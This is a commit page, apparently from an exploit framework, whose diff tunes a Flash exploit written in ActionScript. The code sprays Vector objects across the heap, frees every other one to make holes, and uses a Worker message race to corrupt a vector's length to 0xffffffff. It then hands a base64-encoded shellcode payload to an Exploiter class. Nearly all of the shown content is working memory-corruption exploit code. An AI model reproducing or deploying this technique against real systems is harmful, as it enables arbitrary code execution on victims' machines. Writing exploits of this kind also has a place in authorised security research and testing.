Play with memory al little bit better
This commit is contained in:
jvazquez-r7
Binary file not shown.
+9
-15
@@ -23,7 +23,7 @@ import mx.utils.Base64Decoder
|
||||
|
||||
public class Exploit extends Sprite
|
||||
{
|
||||
private var ov:Vector.<Object> = new Vector.<Object>(120000)
|
||||
private var ov:Vector.<Object> = new Vector.<Object>(80000)
|
||||
private var uv:Vector.<uint>
|
||||
private var ba:ByteArray = new ByteArray()
|
||||
private var worker:Worker
|
||||
@@ -44,16 +44,6 @@ public class Exploit extends Sprite
|
||||
{
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||
Logger.log("od: " + os)
|
||||
var ov_limit:uint
|
||||
if (os == "Windows 8.1" || os == "Windows 8") {
|
||||
ov_limit = 80000
|
||||
} else {
|
||||
ov_limit = 60000
|
||||
}
|
||||
Logger.log("ov: " + ov.length.toString())
|
||||
Logger.log("ov_limit: " + ov_limit.toString())
|
||||
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
@@ -66,9 +56,10 @@ public class Exploit extends Sprite
|
||||
for (var i:uint = 0; i < ov.length; i++) {
|
||||
ov[i] = new Vector.<uint>(1014)
|
||||
ov[i][0] = 0xdeedbeef
|
||||
ov[i][1] = 0xdeadbeef
|
||||
}
|
||||
Logger.log("holes")
|
||||
for (i = 0; i < ov_limit; i += 2) {
|
||||
for (i = 0; i < 70000; i += 2) {
|
||||
delete(ov[i])
|
||||
}
|
||||
worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
|
||||
@@ -89,7 +80,7 @@ public class Exploit extends Sprite
|
||||
ov[0] = new Vector.<uint>(1022)
|
||||
mc.send("")
|
||||
while (mc.messageAvailable);
|
||||
for (var i:uint = 0; i < 20000; i++) {
|
||||
for (var i:uint = 0;; i++) {
|
||||
if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
|
||||
ov[0][i] = 0xffffffff
|
||||
break
|
||||
@@ -104,12 +95,15 @@ public class Exploit extends Sprite
|
||||
var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
|
||||
Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
|
||||
if (mod == 1022) mc.receive()
|
||||
else {
|
||||
else {
|
||||
for (var i:uint = 0; i < ov.length; i++) {
|
||||
if (ov[i].length == 0xffffffff) {
|
||||
uv = ov[i]
|
||||
} else {
|
||||
ov[i] = null
|
||||
if (ov[i] != null) {
|
||||
delete(ov[i])
|
||||
ov[i] = null
|
||||
}
|
||||
}
|
||||
}
|
||||
if (uv == null) {
|
||||
|
||||
+2
-2
@@ -24,7 +24,7 @@ package
|
||||
private var payload_address:uint
|
||||
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(89698)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(15000)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
|
||||
{
|
||||
@@ -32,7 +32,7 @@ package
|
||||
payload = p
|
||||
platform = pl
|
||||
op_system = os
|
||||
|
||||
|
||||
ev = new ExploitVector(uv)
|
||||
if (!ev.is_ready()) return
|
||||
eba = new ExploitByteArray(platform)
|
||||
|
||||
Reference in New Issue
Block a user